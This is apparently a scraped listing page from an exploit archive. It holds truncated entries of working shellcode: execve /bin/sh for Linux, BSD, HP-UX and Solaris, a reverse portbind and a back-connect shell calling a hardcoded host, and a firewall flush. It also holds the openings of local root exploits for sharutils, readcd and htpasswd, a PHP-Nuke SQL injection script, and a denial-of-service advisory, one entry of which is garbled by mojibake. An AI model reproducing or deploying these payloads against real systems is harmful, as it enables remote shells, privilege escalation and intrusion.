linux/x86 xterm -ut -display [IP]:0 132 bytes

Exploit for linux/x86 platform in category shellcode ============================================= linux/x86 xterm -ut -display IP:0 132 bytes ============================================= / Linux/x86 execve of /usr/X11R6/bin/xterm -ut -display ip:0, exit 127.0.0.1 is an example, you must change ...

os-x/PPC create /tmp/suid 122 bytes

Exploit for os-x/ppc platform in category shellcode =================================== os-x/PPC create /tmp/suid 122 bytes =================================== / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does open; write; close; exit; See ASM below. 122 Bytes. / char shellcode =...

bsd/x86 reverse portbind 129 bytes

Exploit for bsd/x86 platform in category shellcode ================================== bsd/x86 reverse portbind 129 bytes ================================== / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on...

bsd/x86 execve /bin/sh setuid (0) 29 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...

bsdi/x86 execve /bin/sh 46 bytes

No description provided by source. / BSDi execve of /bin/sh by v9 [email protected] / static char exec= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" / 14 characters. / "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" / 14 characters. /...

linux/x86 ipchains -F 49 bytes

linux/x86 ipchains -F 49 bytes. Shellcode exploit for linx86 platform include include / asm" sub $0x4,%esp Con esto conseguimos que la shellcode nunca se popl %esp sobreescriba... gracias RaiSe : xorl %edx,%edx %edx a cero pushl %edx y ponemos los zeros del final del string en memoria pushw $0x46...

solaris/x86 execve /bin/sh toupper evasion 84 bytes

solaris/x86 execve /bin/sh toupper evasion 84 bytes. Shellcode exploit for solarisx86 platform / Solaris/x86 Used for toupper evasion look to the linux version for an explanation and usage example. / char c0de = / main: / "\xeb\x33" / jmp callz / / start: / "\x5e" / popl %esi / "\x8d\x06" / leal...

bsd/x86 execve /bin/sh Crypt /bin/sh 49 bytes

No description provided by source. / Self decripting dec/inc shellcode executes /bin/sh Size 49 bytes OS BSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short shellcode main: pop esi xor ecx,ecx mov cl,28 maindecript: inc byte esi+ecx loop maindecript inc byte esi push esi...

bsd/x86 connect 93 bytes

No description provided by source. / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id rus-sec /EFnet rootteam.host.sk BITS 32 jmp short path main: pop esi xor eax,eax mov byte...

HPUX execve /bin/sh 58 bytes

No description provided by source. / Hp-Ux execve of /bin/sh by K2 / uchar shellcode = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"...

linux/x86 ipchains -F 49 bytes

No description provided by source. include stdio.h include string.h / asm" sub $0x4,%esp Con esto conseguimos que la shellcode nunca se popl %esp sobreescriba... gracias RaiSe : xorl %edx,%edx %edx a cero pushl %edx y ponemos los zeros del final del string en memoria pushw $0x462d tenemos -F0000...

GNU Sharutils <= 4.2.1 Local Format String PoC Exploit

No description provided by source. / GNU sharutils = 4.2.1 Local Format String POC Code C0ded by n4rk0tix a.k.a nrktx [email protected] Below is a l4m3 proof of concept code for da recently reported lame bug; These binaryz have not only format bugz, but also buffer overflowz,etc.We also...

CDRecord's ReadCD Local Root Privileges

Exploit for linux platform in category local exploits ======================================= CDRecord's ReadCD Local Root Privileges ======================================= !/bin/bash echo "readcd-exp.sh -- ReadCD local exploit Test on cdrecord-2.01-0.a27.2mdk" echo "Author : newbug at chroot.or...

PHP-Nuke SQL Injection Edit/Save Message(s) Bug

Exploit for unknown platform in category web applications =============================================== PHP-Nuke SQL Injection Edit/Save Messages Bug =============================================== !/usr/bin/perl use LWP; $log = "poskomenphpnukesavemsg.txt"; $Agent = "Mbahmubangga/1.0"; $proxy ...

htpasswd Apache 1.3.31 - Local Overflow

!/usr/bin/perl Proof Of Concept exploit for htpasswd of Apache. Read the advisory for more information. - Luiz Fernando Camargo - foxtrotatflowsecurity.org $shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"...

Pingtel Xpressa 1.2.x/2.0/2.1 - Handset Remote Denial of Service

source: https://www.securityfocus.com/bid/11161/info Pingtel Xpressa handsets are reported prone to a remote denial of service vulnerability. The issue is reported to exist because of a lack of sufficient boundary checks performed on HTTP request data handled by the Xpressa administration web...

adv17.txt

+| Advisory 17. Search Engine & Directory by Turbo Seek Software: Search Engine & Directory Powered by Turbo Seek Vendor: FocalMedia.Net http://www.focalmedia.net Vulnerability: âîçìîæíîñòü ÷òåíèÿ ôàéëîâ Risk: ñðåäíèé Date: 10'Sept 2004 discovered by durito -duritoatmaildotru- HTTP: www.lwb57.org...

linux/x86 bsd/x86 execve /bin/sh 38 bytes

Exploit for multiple platform in category shellcode ========================================= linux/x86 bsd/x86 execve /bin/sh 38 bytes ========================================= / Linux/x86 and Bsd/x86 execve of /bin/sh by dymitri!!! / include char code = "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68"...

linux/x86 execve /bin/sh xor encrypted 55 bytes

No description provided by source. / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function start: xorl %eax,%eax jmp 0x22 popl %ebx movl 8%ebx,%edx xor %edx,%ebx xor %edx,4%ebx xor %edx,%edx movl %ebx,0x8%esp movl %edx,0xc%esp movb $0xb,%al leal 0x8%esp,%e...

linux/x86 execve /bin/sh 24 bytes

No description provided by source. / [email protected] execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // mov...